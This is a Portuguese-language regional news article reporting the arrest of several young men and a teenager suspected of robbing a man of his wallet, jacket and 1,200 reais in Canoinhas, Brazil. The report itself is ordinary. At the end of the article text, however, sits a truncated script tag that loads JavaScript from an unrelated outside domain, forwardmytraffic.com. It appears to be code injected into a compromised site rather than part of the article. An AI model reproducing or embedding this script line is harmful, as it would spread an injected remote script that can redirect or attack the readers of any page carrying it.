InícioPolíciaJovens São Presos e Adolescente é Apreendido Suspeito de Roubo

Jovens São Presos e Adolescente é Apreendido Suspeito de Roubo

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Na sexta-feira, 01, por volta das 15h, um jovem de cabelo, corte tipo moicano, chegou na residência da vítima, no bairro Jardim Esperança e usando de força física tomou a carteira e a jaqueta do mesmo.

 

 

De posse das informações, a equipe PM de imediato iniciou as buscas para localizar o suspeito, sendo que logo em seguida, a equipe PM recebeu uma denúncia via Facebook, da identidade do suspeito do roubo e o local onde estaria naquele momento.

 

 

Os policiais militares em rondas pela Rua C no Serrajão, avistou um dos envolvidos em frente a casa denunciada, foi tentar abordá-lo, porém, o mesmo tentou correr para adentrar na casa e foi detido na porta, momento em que foi avistado mais suspeitos no interior da casa, sendo que os mesmo correram e subiram no sótão, sendo necessário o policial subir atrás para detê-los.

 

 

Na entrevista policial com os suspeitos, depois de devidamente identificados, um deles afirmou ser o autor do roubo.

 

 

No forro foi encontrado 152 reais escondidos debaixo de uma linha. O restante do dinheiro, tendo em vista que foram roubados 1200 reais da vítima, os agentes não quiseram relatar onde estava.

 

 

Também via Facebook, a equipe PM recebeu denúncia que o restante do dinheiro, parte foi trocado por droga com um homem e parte estava com a mãe de um dos suspeitos, que não foi localizada.

 

 

Diante dos fatos, foi dado voz de prisão aos jovens e o adolescente foi apreendido em flagrante, sendo todos conduzidos para providências…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.